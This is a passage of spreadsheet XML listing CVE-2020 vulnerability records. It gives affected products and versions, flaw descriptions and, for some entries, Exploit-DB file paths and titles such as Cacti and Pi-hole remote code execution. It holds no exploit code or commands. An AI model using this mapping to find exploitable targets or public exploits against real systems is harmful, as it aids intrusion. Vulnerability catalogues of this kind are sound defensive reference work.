    <t>Synaptive Medical ClearCanvas ImageServer 3.0 Alpha allows XSS (and HTML injection) via the Default.aspx UserName parameter. NOTE: the issues/227 reference does not imply that the affected product can be downloaded from GitHub. It was simply a convenient location for a public bug report.</t>
  </si>
  <si>
    <t>CVE-2020-8789</t>
  </si>
  <si>
    <t>Composr 10.0.30 allows Persistent XSS via a Usergroup name under the Security configuration.</t>
  </si>
  <si>
    <t>CVE-2020-8790</t>
  </si>
  <si>
    <t>The OKLOK (3.1.1) mobile companion app for Fingerprint Bluetooth Padlock FB50 (2.3) has weak password requirements combined with improper restriction of excessive authentication attempts, which could allow a remote attacker to discover user credentials and obtain access via a brute force attack.</t>
  </si>
  <si>
    <t>CVE-2020-8791</t>
  </si>
  <si>
    <t>The OKLOK (3.1.1) mobile companion app for Fingerprint Bluetooth Padlock FB50 (2.3) allows remote attackers to submit API requests using authenticated but unauthorized tokens, resulting in IDOR issues. A remote attacker can use their own token to make unauthorized API requests on behalf of arbitrary user IDs. Valid and current user IDs are trivial to guess because of the user ID assignment convention used by the app. A remote attacker could harvest email addresses, unsalted MD5 password hashes, owner-assigned lock names, and owner-assigned fingerprint names for any range of arbitrary user IDs.</t>
  </si>
  <si>
    <t>CVE-2020-8792</t>
  </si>
  <si>
    <t>The OKLOK (3.1.1) mobile companion app for Fingerprint Bluetooth Padlock FB50 (2.3) has an information-exposure issue. In the mobile app, an attempt to add an already-bound lock by its barcode reveals the email address of the account to which the lock is bound, as well as the name of the lock. Valid barcode inputs can be easily guessed because barcode strings follow a predictable pattern. Correctly guessed valid barcode inputs entered through the app interface disclose arbitrary users' email addresses and lock names.</t>
  </si>
  <si>
    <t>CVE-2020-8793</t>
  </si>
  <si>
    <t>OpenSMTPD before 6.6.4 allows local users to read arbitrary files (e.g., on some Linux distributions) because of a combination of an untrusted search path in makemap.c and race conditions in the offline functionality in smtpd.c.</t>
  </si>
  <si>
    <t>exploits/linux/remote/48139.c</t>
  </si>
  <si>
    <t>OpenSMTPD 6.6.3 - Arbitrary File Read</t>
  </si>
  <si>
    <t>2020-02-26</t>
  </si>
  <si>
    <t>CVE-2020-8794</t>
  </si>
  <si>
    <t>OpenSMTPD before 6.6.4 allows remote code execution because of an out-of-bounds read in mta_io in mta_session.c for multi-line replies. Although this vulnerability affects the client side of OpenSMTPD, it is possible to attack a server because the server code launches the client code during bounce handling.</t>
  </si>
  <si>
    <t>exploits/openbsd/remote/48140.c</t>
  </si>
  <si>
    <t>OpenSMTPD &lt; 6.6.3p1 - Local Privilege Escalation + Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-8795</t>
  </si>
  <si>
    <t>In GitLab Enterprise Edition (EE) 12.5.0 through 12.7.5, sharing a group with a group could grant project access to unauthorized users.</t>
  </si>
  <si>
    <t>CVE-2020-8796</t>
  </si>
  <si>
    <t>Biscom Secure File Transfer (SFT) before 5.1.1071 and 6.0.1xxx before 6.0.1005 allows Remote Code Execution on the server.</t>
  </si>
  <si>
    <t>CVE-2020-8797</t>
  </si>
  <si>
    <t>Juplink RX4-1500 v1.0.3 allows remote attackers to gain root access to the Linux subsystem via an unsanitized exec call (aka Command Line Injection), if the undocumented telnetd service is enabled and the attacker can authenticate as admin from the local network.</t>
  </si>
  <si>
    <t>CVE-2020-8798</t>
  </si>
  <si>
    <t>httpd in Juplink RX4-1500 v1.0.3-v1.0.5 allows remote attackers to change or access router settings by connecting to the unauthenticated setup3.htm endpoint from the local network.</t>
  </si>
  <si>
    <t>CVE-2020-8799</t>
  </si>
  <si>
    <t>A Stored XSS vulnerability has been found in the administration page of the WTI Like Post plugin through 1.4.5 for WordPress. Once the administrator has submitted the data, the script stored is executed for all the users visiting the website.</t>
  </si>
  <si>
    <t>CVE-2020-8800</t>
  </si>
  <si>
    <t>SuiteCRM through 7.11.11 allows EmailsControllerActionGetFromFields PHP Object Injection.</t>
  </si>
  <si>
    <t>CVE-2020-8801</t>
  </si>
  <si>
    <t>SuiteCRM through 7.11.11 allows PHAR Deserialization.</t>
  </si>
  <si>
    <t>CVE-2020-8802</t>
  </si>
  <si>
    <t>SuiteCRM through 7.11.11 has Incorrect Access Control via action_saveHTMLField Bean Manipulation.</t>
  </si>
  <si>
    <t>CVE-2020-8803</t>
  </si>
  <si>
    <t>SuiteCRM through 7.11.11 allows Directory Traversal to include arbitrary .php files within the webroot via add_to_prospect_list.</t>
  </si>
  <si>
    <t>CVE-2020-8804</t>
  </si>
  <si>
    <t>SuiteCRM through 7.11.10 allows SQL Injection via the SOAP API, the EmailUIAjax interface, or the MailMerge module.</t>
  </si>
  <si>
    <t>CVE-2020-8806</t>
  </si>
  <si>
    <t>Electric Coin Company Zcashd before 2.1.1-1 allows attackers to trigger consensus failure and double spending. A valid chain could be incorrectly rejected because timestamp requirements on block headers were not properly enforced.</t>
  </si>
  <si>
    <t>CVE-2020-8807</t>
  </si>
  <si>
    <t>In Electric Coin Company Zcashd before 2.1.1-1, the time offset between messages could be leveraged to obtain sensitive information about the relationship between a suspected victim's address and an IP address, aka a timing side channel.</t>
  </si>
  <si>
    <t>CVE-2020-8808</t>
  </si>
  <si>
    <t>The CorsairLLAccess64.sys and CorsairLLAccess32.sys drivers in CORSAIR iCUE before 3.25.60 allow local non-privileged users (including low-integrity level processes) to read and write to arbitrary physical memory locations, and consequently gain NT AUTHORITY\SYSTEM privileges, via a function call such as MmMapIoSpace.</t>
  </si>
  <si>
    <t>CVE-2020-8809</t>
  </si>
  <si>
    <t>Gurux GXDLMS Director prior to 8.5.1905.1301 downloads updates to add-ins and OBIS code over an unencrypted HTTP connection. A man-in-the-middle attacker can prompt the user to download updates by modifying the contents of gurux.fi/obis/files.xml and gurux.fi/updates/updates.xml. Then, the attacker can modify the contents of downloaded files. In the case of add-ins (if the user is using those), this will lead to code execution. In case of OBIS codes (which the user is always using as they are needed to communicate with the energy meters), this can lead to code execution when combined with CVE-2020-8810.</t>
  </si>
  <si>
    <t>CVE-2020-8810</t>
  </si>
  <si>
    <t>An issue was discovered in Gurux GXDLMS Director through 8.5.1905.1301. When downloading OBIS codes, it does not verify that the downloaded files are actual OBIS codes and doesn't check for path traversal. This allows the attacker exploiting CVE-2020-8809 to send executable files and place them in an autorun directory, or to place DLLs inside the existing GXDLMS Director installation (run on next execution of GXDLMS Director). This can be used to achieve code execution even if the user doesn't have any add-ins installed.</t>
  </si>
  <si>
    <t>CVE-2020-8811</t>
  </si>
  <si>
    <t>ajax/profile-picture-upload.php in Bludit 3.10.0 allows authenticated users to change other users' profile pictures.</t>
  </si>
  <si>
    <t>CVE-2020-8812</t>
  </si>
  <si>
    <t>** DISPUTED ** Bludit 3.10.0 allows Editor or Author roles to insert malicious JavaScript on the WYSIWYG editor. NOTE: the vendor's perspective is that this is "not a bug."</t>
  </si>
  <si>
    <t>CVE-2020-8813</t>
  </si>
  <si>
    <t>graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48145.py</t>
  </si>
  <si>
    <t>Cacti 1.2.8 - Unauthenticated Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-8815</t>
  </si>
  <si>
    <t>Improper connection handling in the base connection handler in IKTeam BearFTP before v0.3.1 allows a remote attacker to achieve denial of service via a Slowloris approach by sending a large volume of small packets.</t>
  </si>
  <si>
    <t>CVE-2020-8816</t>
  </si>
  <si>
    <t>Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease.</t>
  </si>
  <si>
    <t>exploits/python/webapps/48727.py</t>
  </si>
  <si>
    <t>Pi-hole 4.3.2 - Remote Code Execution (Authenticated)</t>
  </si>
  <si>
    <t>2020-08-04</t>
  </si>
  <si>
    <t>CVE-2020-8817</t>
  </si>
  <si>
    <t>Dataiku DSS before 6.0.5 allows attackers write access to the project to modify the "Created by" metadata.</t>
  </si>
  <si>
    <t>CVE-2020-8818</t>
  </si>
  <si>
    <t>An issue was discovered in the CardGate Payments plugin through 2.0.30 for Magento 2. Lack of origin authentication in the IPN callback processing function in Controller/Payment/Callback.php allows an attacker to remotely replace critical plugin settings (merchant ID, secret key, etc.) and therefore bypass the payment process (e.g., spoof an order status by manually sending an IPN callback request with a valid signature but without real payment) and/or receive all of the subsequent payments.</t>
  </si>
  <si>
    <t>CVE-2020-8819</t>
  </si>
  <si>
    <t>An issue was discovered in the CardGate Payments plugin through 3.1.15 for WooCommerce. Lack of origin authentication in the IPN callback processing function in cardgate/cardgate.php allows an attacker to remotely replace critical plugin settings (merchant ID, secret key, etc.) and therefore bypass the payment process (e.g., spoof an order status by manually sending an IPN callback request with a valid signature but without real payment) and/or receive all of the subsequent payments.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48134.php</t>
  </si>
  <si>
    <t>WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass</t>
  </si>
  <si>
    <t>2020-02-25</t>
  </si>
  <si>
    <t>CVE-2020-8820</t>
  </si>
  <si>
    <t>An XSS Vulnerability exists in Webmin 1.941 and earlier affecting the Cluster Shell Commands Endpoint. A user may enter any XSS Payload into the Command field and execute it. Then, after revisiting the Cluster Shell Commands Menu, the XSS Payload will be rendered and executed.</t>
  </si>
  <si>
    <t>CVE-2020-8821</t>
  </si>
  <si>
    <t>An Improper Data Validation Vulnerability exists in Webmin 1.941 and earlier affecting the Command Shell Endpoint. A user may enter HTML code into the Command field and submit it. Then, after visiting the Action Logs Menu and displaying logs, the HTML code will be rendered (however, JavaScript is not executed). Changes are kept across users.</t>
  </si>
  <si>
    <t>CVE-2020-8822</t>
  </si>
  <si>
    <t>Digi TransPort WR21 5.2.2.3, WR44 5.1.6.4, and WR44v2 5.1.6.9 devices allow stored XSS in the web application.</t>
  </si>
  <si>
    <t>CVE-2020-8823</t>
  </si>
  <si>
    <t>htmlfile in lib/transport/htmlfile.js in SockJS before 0.3.0 is vulnerable to Reflected XSS via the /htmlfile c (aka callback) parameter.</t>
  </si>
  <si>
    <t>CVE-2020-8824</t>
  </si>
  <si>
    <t>Hitron CODA-4582U 7.1.1.30 devices allow XSS via a Managed Device name on the Wireless &gt; Access Control &gt; Add Managed Device screen.</t>
  </si>
  <si>
    <t>CVE-2020-8825</t>
  </si>
  <si>
    <t>index.php?p=/dashboard/settings/branding in Vanilla 2.6.3 allows stored XSS.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48042.txt</t>
  </si>
  <si>
    <t>Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-8826</t>
  </si>
  <si>
    <t>As of v1.5.0, the Argo web interface authentication system issued immutable tokens. Authentication tokens, once issued, were usable forever without expiration—there was no refresh or forced re-authentication.</t>
  </si>
  <si>
    <t>CVE-2020-8827</t>
  </si>
  <si>
    <t>As of v1.5.0, the Argo API does not implement anti-automation measures such as rate limiting, account lockouts, or other anti-bruteforce measures. Attackers can submit an unlimited number of authentication attempts without consequence.</t>
  </si>
  <si>
    <t>CVE-2020-8828</t>
  </si>
  <si>
    <t>As of v1.5.0, the default admin password is set to the argocd-server pod name. For insiders with access to the cluster or logs, this issue could be abused for privilege escalation, as Argo has privileged roles. A malicious insider is the most realistic threat, but pod names are not meant to be kept secret and could wind up just about anywhere.</t>
  </si>
  <si>
    <t>CVE-2020-8829</t>
  </si>
  <si>
    <t>CSRF on Intelbras CIP 92200 devices allows an attacker to access the panel and perform scraping or other analysis.</t>
  </si>
  <si>
    <t>CVE-2020-8830</t>
  </si>
  <si>
    <t>CSRF in login.asp on Ruckus devices allows an attacker to access the panel, and use SSRF to perform scraping or other analysis via the SUBCA-1 field on the Wireless Admin screen.</t>
  </si>
  <si>
    <t>CVE-2020-8831</t>
  </si>
  <si>
    <t>Apport creates a world writable lock file with root ownership in the world writable /var/lock/apport directory. If the apport/ directory does not exist (this is not uncommon as /var/lock is a tmpfs), it will create the directory, otherwise it will simply continue execution using the existing directory. This allows for a symlink attack if an attacker were to create a symlink at /var/lock/apport, changing apport's lock file location. This file could then be used to escalate privileges, for example. Fixed in versions 2.20.1-0ubuntu2.23, 2.20.9-0ubuntu7.14, 2.20.11-0ubuntu8.8 and 2.20.11-0ubuntu22.</t>
  </si>
  <si>
    <t>CVE-2020-8832</t>
  </si>
  <si>
    <t>The fix for the Linux kernel in Ubuntu 18.04 LTS for CVE-2019-14615 ("The Linux kernel did not properly clear data structures on context switches for certain Intel graphics processors.") was discovered to be incomplete, meaning that in versions of the kernel before 4.15.0-91.92, an attacker could use this vulnerability to expose sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-8833</t>
  </si>
  <si>
    <t>Time-of-check Time-of-use Race Condition vulnerability on crash report ownership change in Apport allows for a possible privilege escalation opportunity. If fs.protected_symlinks is disabled, this can be exploited between the os.open and os.chown calls when the Apport cron script clears out crash files of size 0. A symlink with the same name as the deleted file can then be created upon which chown will be called, changing the file owner to root. Fixed in versions 2.20.1-0ubuntu2.23, 2.20.9-0ubuntu7.14, 2.20.11-0ubuntu8.8 and 2.20.11-0ubuntu22.</t>
  </si>
  <si>
    <t>CVE-2020-8834</t>
  </si>
  <si>
    <t>KVM in the Linux kernel on Power8 processors has a conflicting use of HSTATE_HOST_R1 to store r1 state in kvmppc_hv_entry plus in kvmppc_{save,restore}_tm, leading to a stack corruption. Because of this, an attacker with the ability run code in kernel space of a guest VM can cause the host kernel to panic. There were two commits that, according to the reporter, introduced the vulnerability: f024ee098476 ("KVM: PPC: Book3S HV: Pull out TM state save/restore into separate procedures") 87a11bb6a7f7 ("KVM: PPC: Book3S HV: Work around XER[SO] bug in fake suspend mode") The former landed in 4.8, the latter in 4.17. This was fixed without realizing the impact in 4.18 with the following three commits, though it's believed the first is the only strictly necessary commit: 6f597c6b63b6 ("KVM: PPC: Book3S PR: Add guest MSR parameter for kvmppc_save_tm()/kvmppc_restore_tm()") 7b0e827c6970 ("KVM: PPC: Book3S HV: Factor fake-suspend handling out of kvmppc_save/restore_tm") 009c872a8bc4 ("KVM: PPC: Book3S PR: Move kvmppc_save_tm/kvmppc_restore_tm to separate file")</t>
  </si>
  <si>
    <t>CVE-2020-8835</t>
  </si>
  <si>
    <t>In the Linux kernel 5.5.0 and newer, the bpf verifier (kernel/bpf/verifier.c) did not properly restrict the register bounds for 32-bit operations, leading to out-of-bounds reads and writes in kernel memory. The vulnerability also affects the Linux 5.4 stable series, starting with v5.4.7, as the introducing commit was backported to that branch. This vulnerability was fixed in 5.6.1, 5.5.14, and 5.4.29. (issue is aka ZDI-CAN-10780)</t>
  </si>
  <si>
    <t>CVE-2020-8838</t>
  </si>
  <si>
    <t>An issue was discovered in Zoho ManageEngine AssetExplorer 6.5. During an upgrade of the Windows agent, it does not validate the source and binary downloaded. This allows an attacker on an adjacent network to execute code with NT AUTHORITY/SYSTEM privileges on the agent machines by providing an arbitrary executable via a man-in-the-middle attack.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-8839</t>
  </si>
  <si>
    <t>Stored XSS was discovered on CHIYU BF-430 232/485 TCP/IP Converter devices before 1.16.00, as demonstrated by the /if.cgi TF_submask field.</t>
  </si>
  <si>
    <t>exploits/cgi/webapps/48040.txt</t>
  </si>
  <si>
    <t>CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-8840</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.0.0 through 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter.</t>
  </si>
  <si>
    <t>CVE-2020-8841</t>
  </si>
  <si>
    <t>An issue was discovered in TestLink 1.9.19. The relation_type parameter of the lib/requirements/reqSearch.php endpoint is vulnerable to authenticated SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-8843</t>
  </si>
  <si>
    <t>An issue was discovered in Istio 1.3 through 1.3.6. Under certain circumstances, it is possible to bypass a specifically configured Mixer policy. Istio-proxy accepts the x-istio-attributes header at ingress that can be used to affect policy decisions when Mixer policy selectively applies to a source equal to ingress. To exploit this vulnerability, someone has to encode a source.uid in this header. This feature is disabled by default in Istio 1.3 and 1.4.</t>
  </si>
  <si>
    <t>CVE-2020-8844</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.6.0.25114. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG files within CovertToPDF. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before writing to memory. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9102.</t>
  </si>
  <si>
    <t>CVE-2020-8845</t>
  </si>
  <si>
    <t>This vulnerability allows remote atackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.6.0.25114. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of watermarks in AcroForms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9358.</t>
  </si>
  <si>
    <t>CVE-2020-8846</t>
  </si>
  <si>
    <t>This vulnerability allows remote atackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.6.0.25114. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of text field objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9400.</t>
  </si>
  <si>
    <t>CVE-2020-8847</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.7.0.29455. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of JPEG2000 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9414.</t>
  </si>
  <si>
    <t>CVE-2020-8848</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.7.0.29455. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of JPG2000 images. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9407.</t>
  </si>
  <si>
    <t>CVE-2020-8849</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.7.0.29455. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of JPEG2000 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9413.</t>
  </si>
  <si>
    <t>CVE-2020-8850</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.7.0.29455. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of JPEG2000 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9415.</t>
  </si>
  <si>
    <t>CVE-2020-8851</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.7.0.29455. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of JPG2000 images. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9406.</t>
  </si>
  <si>
    <t>CVE-2020-8852</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 9.7.0.29455. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of JPEG2000 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-9416.</t>
  </si>
  <si>
    <t>CVE-2020-8853</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the conversion of HTML files to PDF. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9591.</t>
  </si>
  <si>
    <t>CVE-2020-8854</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.29478. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the conversion of JPEG files to PDF. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9606.</t>
  </si>
  <si>
    <t>CVE-2020-8855</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.7.0.2947. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the fxhtml2pdf.exe module. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9560.</t>
  </si>
  <si>
    <t>CVE-2020-8856</t>
  </si>
  <si>
    <t>This vulnerability allows remote atackers to execute arbitrary code on affected installations of Foxit PhantomPDF 9.6.0.25608. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of watermarks. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9640.</t>
  </si>
  <si>
    <t>CVE-2020-8857</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.7.0.29455. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of form Annotation objects within AcroForms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9862.</t>
  </si>
  <si>
    <t>CVE-2020-8858</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Moxa MGate 5105-MB-EIP firmware version 4.1. Authentication is required to exploit this vulnerability. The specific flaw exists within the DestIP parameter within MainPing.asp. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9552.</t>
  </si>
  <si>
    <t>CVE-2020-8859</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of ELOG Electronic Logbook 3.1.4-283534d. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of HTTP parameters. A crafted request can trigger the dereference of a null pointer. An attacker can leverage this vulnerability to create a denial-of-service condition. Was ZDI-CAN-10115.</t>
  </si>
  <si>
    <t>CVE-2020-8860</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Samsung Galaxy S10 Firmware G973FXXS3ASJA, O(8.x), P(9.0), Q(10.0) devices with Exynos chipsets. User interaction is required to exploit this vulnerability in that the target must answer a phone call. The specific flaw exists within the Call Control Setup messages. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the baseband processor. Was ZDI-CAN-9658.</t>
  </si>
  <si>
    <t>CVE-2020-8861</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DAP-1330 1.10B01 BETA Wi-Fi range extenders. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HNAP login requests. The issue results from the lack of proper handling of cookies. An attacker can leverage this vulnerability to execute arbitrary code on the router. Was ZDI-CAN-9554.</t>
  </si>
  <si>
    <t>CVE-2020-8862</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DAP-2610 Firmware v2.01RC067 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of passwords. The issue results from the lack of proper password checking. An attacker can leverage this vulnerability to execute arbitrary code in the context of root. Was ZDI-CAN-10082.</t>
  </si>
  <si>
    <t>CVE-2020-8863</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-867, DIR-878, and DIR-882 routers with firmware 1.10B04. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HNAP login requests. The issue results from the lack of proper implementation of the authentication algorithm. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the router. Was ZDI-CAN-9470.</t>
  </si>
  <si>
    <t>CVE-2020-8864</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-867, DIR-878, and DIR-882 routers with firmware 1.10B04. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HNAP login requests. The issue results from the lack of proper handling of empty passwords. An attacker can leverage this vulnerability to execute arbitrary code on the router. Was ZDI-CAN-9471.</t>
  </si>
  <si>
    <t>CVE-2020-8865</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within edit.php. When parsing the params[template] parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10469.</t>
  </si>
  <si>
    <t>CVE-2020-8866</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to create arbitrary files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within add.php. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10125.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48209.py</t>
  </si>
  <si>
    <t>Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion</t>
  </si>
  <si>
    <t>2020-03-11</t>
  </si>
  <si>
    <t>CVE-2020-8867</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of OPC Foundation UA .NET Standard 1.04.358.30. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of sessions. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to create a denial-of-service condition against the application. Was ZDI-CAN-10295.</t>
  </si>
  <si>
    <t>CVE-2020-8868</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Quest Foglight Evolve 9.0.0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the __service__ user account. The product contains a hard-coded password for this account. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-9553.</t>
  </si>
  <si>
    <t>CVE-2020-8869</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of TIF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9881.</t>
  </si>
  <si>
    <t>CVE-2020-8870</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of TIF files from the GetTIFPalette method. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9931.</t>
  </si>
  <si>
    <t>CVE-2020-8871</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.0-47107 . An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the VGA virtual device. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the hypervisor. Was ZDI-CAN-9403.</t>
  </si>
  <si>
    <t>CVE-2020-8872</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 15.1.1-47117. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the xHCI component. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the hypervisor. Was ZDI-CAN-9428.</t>
  </si>
  <si>
    <t>CVE-2020-8873</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.2-47123. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the xHCI component. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the hypervisor. Was ZDI-CAN-10031.</t>
  </si>
